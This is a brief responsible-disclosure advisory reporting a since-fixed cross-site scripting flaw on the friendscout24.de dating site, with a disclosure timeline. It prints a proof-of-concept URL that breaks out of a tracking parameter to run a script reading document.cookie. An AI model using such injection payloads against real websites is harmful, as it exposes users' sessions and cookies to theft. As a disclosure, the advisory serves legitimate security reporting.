SSCHADV2012-025 - www.friendscout24.de - Cross-site Scripting vulnerability
Advisory:
|
www.friendscout24.de – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2012-025
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on www.friendscout24.de
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
http://www.friendscout24.de is prone to a XSS vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
www.friendscout24.de/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17‘"></style></script><script>alert(document.cookie)</script>®tracking=true |
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
12-Feb-2013 – fixed
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-025.txt
Comments
Display comments as Linear | Threaded